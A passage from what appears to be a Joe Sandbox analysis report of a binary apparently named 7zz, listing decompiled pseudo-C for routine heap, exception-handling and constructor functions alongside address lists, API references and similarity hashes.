                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                      • String ID:
                                                                      • API String ID: 1616793339-0
                                                                      • Opcode ID: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                      • Instruction ID: fa3294983cb7f1a3e0ff108d5f2fbcd3700c82697a380beb40c47041fad90e01
                                                                      • Opcode Fuzzy Hash: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                      • Instruction Fuzzy Hash: 8821CC31A40204EBDB10DFA5DC82BAE7764FB00764F20412BF455E72D1E77D9D41865E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046C0FF Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 30%
                                                                      			E0046C0FF(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x47c860);
				_push(E0046CE74);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x496584; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0046E56A(9);
							_v8 = 1;
							_t24 = E0046F866(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								E0046F8BD(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E0046C1C1();
							goto L9;
						}
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = E0046EB0B(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							E0046EB36();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E0046C169();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x496580); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                                                                      0x0046c102
                                                                      0x0046c104
                                                                      0x0046c109
                                                                      0x0046c10e
                                                                      0x0046c114
                                                                      0x0046c115
                                                                      0x0046c122
                                                                      0x0046c127
                                                                      0x0046c12d
                                                                      0x0046c135
                                                                      0x0046c175
                                                                      0x0046c1ca
                                                                      0x00000000
                                                                      0x0046c177
                                                                      0x0046c179
                                                                      0x0046c17f
                                                                      0x0046c18f
                                                                      0x0046c197
                                                                      0x0046c19c
                                                                      0x0046c1a5
                                                                      0x0046c1aa
                                                                      0x0046c1ad
                                                                      0x0046c1b1
                                                                      0x00000000
                                                                      0x0046c1b6
                                                                      0x0046c137
                                                                      0x0046c139
                                                                      0x0046c13f
                                                                      0x0046c144
                                                                      0x0046c14a
                                                                      0x0046c14f
                                                                      0x0046c151
                                                                      0x0046c152
                                                                      0x0046c153
                                                                      0x0046c159
                                                                      0x0046c15a
                                                                      0x0046c15e
                                                                      0x0046c163
                                                                      0x0046c1ba
                                                                      0x0046c1ba
                                                                      0x0046c1bc
                                                                      0x0046c1cb
                                                                      0x0046c1cb
                                                                      0x0046c1d3
                                                                      0x0046c1d3
                                                                      0x0046c1ba
                                                                      0x0046c135
                                                                      0x0046c1dc
                                                                      0x0046c1e7

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074), ref: 0046C1D3
                                                                        • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                        • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                      • String ID:
                                                                      • API String ID: 641406236-0
                                                                      • Opcode ID: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                      • Instruction ID: 879b8716ea47b65f01d40709131112694f9f6cb808c508230637e9ff792a2c59
                                                                      • Opcode Fuzzy Hash: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                      • Instruction Fuzzy Hash: 0921C872940204EBDB11DB96DC46BEE77B8EB05724F14052BF415A21D1F73C99408E6F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041741C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E0041741C(void* __ecx) {
				signed int _t41;
				void* _t50;
				intOrPtr* _t65;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t73;
				void* _t75;

				E0046B890(E00474C5C, _t68);
				_t71 = _t70 - 0x44;
				 *((intOrPtr*)(_t68 - 0x14)) = __ecx + 8;
				E0040862D();
				_t50 = 0;
				_t73 =  *0x490cc4 - _t50; // 0xb
				if(_t73 > 0) {
					 *((intOrPtr*)(_t68 - 0x10)) = 0x490c04;
					do {
						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10))));
						E004174E7(_t68 - 0x50);
						 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
						E00403593(_t68 - 0x44,  *_t65);
						 *((intOrPtr*)(_t68 - 0x4c)) =  *((intOrPtr*)(_t65 + 0x28));
						 *((intOrPtr*)(_t68 - 0x48)) =  *((intOrPtr*)(_t65 + 0x2c));
						_t41 = E0041721B(_t68 - 0x50, _t73,  *((intOrPtr*)(_t65 + 4)),  *((intOrPtr*)(_t65 + 8))); // executed
						 *((char*)(_t68 - 0x50)) = _t41 & 0xffffff00 |  *((intOrPtr*)(_t65 + 0x2c)) != 0x00000000;
						 *((char*)(_t68 - 0x18)) =  *((intOrPtr*)(_t65 + 0x24));
						E0040FA26(_t68 - 0x24,  *((intOrPtr*)(_t65 + 0x20)));
						E0046BAB0( *((intOrPtr*)(_t68 - 0x1c)), _t65 + 0xd,  *((intOrPtr*)(_t65 + 0x20)));
						_t71 = _t71 + 0xc;
						_push(_t68 - 0x50);
						E004177F2( *((intOrPtr*)(_t68 - 0x14)));
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						E00405AAF(_t68 - 0x50);
						 *((intOrPtr*)(_t68 - 0x10)) =  *((intOrPtr*)(_t68 - 0x10)) + 4;
						_t50 = _t50 + 1;
						_t75 = _t50 -  *0x490cc4; // 0xb
					} while (_t75 < 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return 0;
			}











                                                                      0x00417421
                                                                      0x00417426
                                                                      0x0041742d
                                                                      0x00417430
                                                                      0x00417435
                                                                      0x00417437
                                                                      0x0041743d
                                                                      0x00417445
                                                                      0x0041744c
                                                                      0x00417452
                                                                      0x00417454
                                                                      0x0041745b
                                                                      0x00417462
                                                                      0x0041746d
                                                                      0x00417473
                                                                      0x0041747c
                                                                      0x0041748b
                                                                      0x00417491
                                                                      0x00417498
                                                                      0x004174a5
                                                                      0x004174ad
                                                                      0x004174b3
                                                                      0x004174b4
                                                                      0x004174b9
                                                                      0x004174c0
                                                                      0x004174c5
                                                                      0x004174c9
                                                                      0x004174ca
                                                                      0x004174ca
                                                                      0x004174d7
                                                                      0x004174de
                                                                      0x004174e6

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00417421
                                                                        • Part of subcall function 0041721B: __EH_prolog.LIBCMT ref: 00417220
                                                                        • Part of subcall function 004177F2: __EH_prolog.LIBCMT ref: 004177F7
                                                                        • Part of subcall function 00405AAF: __EH_prolog.LIBCMT ref: 00405AB4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
                                                                      • Instruction ID: a26e6283d8f97d39b918b8293e88733ba3edaa614f90ccffc4ac306d58a1923f
                                                                      • Opcode Fuzzy Hash: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
                                                                      • Instruction Fuzzy Hash: 1221BB71D002199FCB10EFE5C9819EEBBB4FF14318F10492EE056A3291DB78AA05CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042A3CD Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E0042A3CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t48;

				E0046B890(E00476E89, _t48);
				_push(__ecx);
				 *((intOrPtr*)(_t48 - 0x10)) = __ecx;
				_t43 = __ecx + 0x10;
				E00421886(__ecx + 0x10); // executed
				 *((intOrPtr*)(__ecx)) = 0x47af30;
				 *((intOrPtr*)(__ecx + 4)) = 0x47ae54;
				 *((intOrPtr*)(__ecx + 8)) = 0x47ae64;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(_t48 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((char*)(_t48 - 4)) = 1;
				E0042A7A4(__ecx + 0x70, 0);
				_t30 = __ecx + 0x244;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				 *((intOrPtr*)(_t30 + 0xc)) = 0;
				 *((intOrPtr*)(_t30 + 0x10)) = 0x10;
				 *_t30 = 0x47b2f8;
				_t31 = __ecx + 0x258;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				 *((intOrPtr*)(_t31 + 0x10)) = 8;
				 *_t31 = 0x47a688;
				 *((char*)(_t48 - 4)) = 4;
				 *((intOrPtr*)(__ecx)) = 0x47b374;
				 *((intOrPtr*)(__ecx + 4)) = 0x47b364;
				 *((intOrPtr*)(__ecx + 8)) = 0x47b350;
				 *((intOrPtr*)(__ecx + 0x14)) = 4;
				 *((char*)(__ecx + 0x240)) = 0;
				E00425658(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return __ecx;
			}






                                                                      0x0042a3d2
                                                                      0x0042a3d7
                                                                      0x0042a3dd
                                                                      0x0042a3e0
                                                                      0x0042a3e5
                                                                      0x0042a3ea
                                                                      0x0042a3f2
                                                                      0x0042a3f9
                                                                      0x0042a400
                                                                      0x0042a403
                                                                      0x0042a406
                                                                      0x0042a40c
                                                                      0x0042a410
                                                                      0x0042a415
                                                                      0x0042a41b
                                                                      0x0042a41e
                                                                      0x0042a421
                                                                      0x0042a424
                                                                      0x0042a42b
                                                                      0x0042a431
                                                                      0x0042a437
                                                                      0x0042a43a
                                                                      0x0042a43d
                                                                      0x0042a440
                                                                      0x0042a447
                                                                      0x0042a44f
                                                                      0x0042a453
                                                                      0x0042a459
                                                                      0x0042a460
                                                                      0x0042a467
                                                                      0x0042a46e
                                                                      0x0042a474
                                                                      0x0042a481
                                                                      0x0042a489

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0042A3D2
                                                                        • Part of subcall function 00421886: __EH_prolog.LIBCMT ref: 0042188B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                      • Instruction ID: 766f131098bcf4af3a9139bea82dcdcfbf831278d29da31b0125813e173acf34
                                                                      • Opcode Fuzzy Hash: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                      • Instruction Fuzzy Hash: 7A21F2B0901744CFC710DF5AC58868AFBE4FB44704F55C9AEC4AE9B621C3B8A948CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00423DB2 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E00423DB2(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				E0046B890(E00476263, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E00408604(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E00408604(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x47b200;
				 *(_t49 - 4) = 5;
				E0040862D();
				 *(_t49 - 4) = 2;
				E00408604(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x47b208;
				 *(_t49 - 4) = 6;
				E0040862D();
				 *(_t49 - 4) = 1;
				E00408604(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				L0040FBE3(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = E004239EF( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                                                                      0x00423db7
                                                                      0x00423dbc
                                                                      0x00423dbd
                                                                      0x00423dc2
                                                                      0x00423dcb
                                                                      0x00423dd2
                                                                      0x00423ddd
                                                                      0x00423de1
                                                                      0x00423de6
                                                                      0x00423dec
                                                                      0x00423def
                                                                      0x00423df7
                                                                      0x00423dfb
                                                                      0x00423e02
                                                                      0x00423e06
                                                                      0x00423e0b
                                                                      0x00423e0e
                                                                      0x00423e11
                                                                      0x00423e19
                                                                      0x00423e1d
                                                                      0x00423e24
                                                                      0x00423e28
                                                                      0x00423e2d
                                                                      0x00423e33
                                                                      0x00423e38
                                                                      0x00423e43
                                                                      0x00423e47
                                                                      0x00423e51
                                                                      0x00423e59

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00423DB7
                                                                        • Part of subcall function 004239EF: __EH_prolog.LIBCMT ref: 004239F4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                      • Instruction ID: 72112a1eb2b5d99c84f1992f09ae961115561c8040eecd3d47dea80afc4ad4fc
                                                                      • Opcode Fuzzy Hash: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                      • Instruction Fuzzy Hash: 28110470A00648CADB04EBA9C11539EFBE59F60308F01459FD092B32D2CFB81B04C7A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418E2D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E00418E2D(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E0046B890(E00474EE0, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x14;
				E00401E26(__ecx + 0x14,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_t21 = E0040B0A0(_t47 - 0x18, _t41);
				 *(_t47 - 4) = 0;
				_t22 = E0040B431(__ecx + 0x20, _t41, _t52,  *_t21); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00407A18( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					E0046B8F4(_t47 + 8, 0x47e128);
				}
				_t24 = E0040862D();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}









                                                                      0x00418e2d
                                                                      0x00418e32
                                                                      0x00418e3c
                                                                      0x00418e42
                                                                      0x00418e47
                                                                      0x00418e4c
                                                                      0x00418e54
                                                                      0x00418e60
                                                                      0x00418e63
                                                                      0x00418e6f
                                                                      0x00418e71
                                                                      0x00418e77
                                                                      0x00418e7f
                                                                      0x00418e8a
                                                                      0x00418e91
                                                                      0x00418e91
                                                                      0x00418e99
                                                                      0x00418e9e
                                                                      0x00418ea5
                                                                      0x00418eab
                                                                      0x00418eb4
                                                                      0x00418ebc

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00418E32
                                                                        • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                        • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 2062786585-0
                                                                      • Opcode ID: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                      • Instruction ID: f1c4790c51f2afa5d83b5d7308df39874a94f843b8eefe83d47d115a6bddce3e
                                                                      • Opcode Fuzzy Hash: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                      • Instruction Fuzzy Hash: 6B01D675A402049EDB20EF26C451ADEBBF5FF84354F00851FE896A32A1CB785649CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00411194 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E00411194(void* __ecx, void* __edx) {
				void* _t17;
				intOrPtr* _t19;
				char _t20;
				void* _t36;
				void* _t41;

				_t17 = E0046B890(E00474258, _t41);
				_t36 = __ecx;
				if( *((intOrPtr*)(__edx + 4)) != 0) {
					_t17 = E00408A3B(__edx);
					_t47 = _t17;
					if(_t17 == 0) {
						E0040B521(_t41 - 0x54);
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						_push(__edx);
						_t19 = E0040B0A0(_t41 - 0x1c, _t36);
						 *(_t41 - 4) = 1;
						_t20 = E0040B431(_t41 - 0x54, _t36, _t47,  *_t19); // executed
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						 *((char*)(_t41 - 0xd)) = _t20;
						E00407A18( *((intOrPtr*)(_t41 - 0x1c)));
						if( *((char*)(_t41 - 0xd)) != 0) {
							E00401E26(__edx, _t41 - 0x2c);
						}
						_t17 = E00407A18( *((intOrPtr*)(_t41 - 0x2c)));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t17;
			}








                                                                      0x00411199
                                                                      0x004111a5
                                                                      0x004111ab
                                                                      0x004111af
                                                                      0x004111b4
                                                                      0x004111b6
                                                                      0x004111bb
                                                                      0x004111c0
                                                                      0x004111c4
                                                                      0x004111ca
                                                                      0x004111d4
                                                                      0x004111d8
                                                                      0x004111dd
                                                                      0x004111e1
                                                                      0x004111e7
                                                                      0x004111f1
                                                                      0x004111f9
                                                                      0x004111f9
                                                                      0x00411201
                                                                      0x00411206
                                                                      0x004111b6
                                                                      0x0041120c
                                                                      0x00411214

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00411199
                                                                        • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                        • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                      • Instruction ID: 608382dd46c2c598823991ebebde0f7aed9941af7d6df7122e602381931aeda8
                                                                      • Opcode Fuzzy Hash: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                      • Instruction Fuzzy Hash: 0E019E31E00258AACF15E7A9D4017EEB7B89F85358F14C0AFE411B32D2CB7C1A08C799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040C914 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E0040C914(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _t17;
				signed int _t18;
				void* _t28;
				void* _t30;

				E0046B890(0x473e64, _t30);
				_push(__ecx);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t17 = E0040C83C(_t30 - 0x10, __ecx,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), __edx,  *((intOrPtr*)(_t30 + 0x10)), 1); // executed
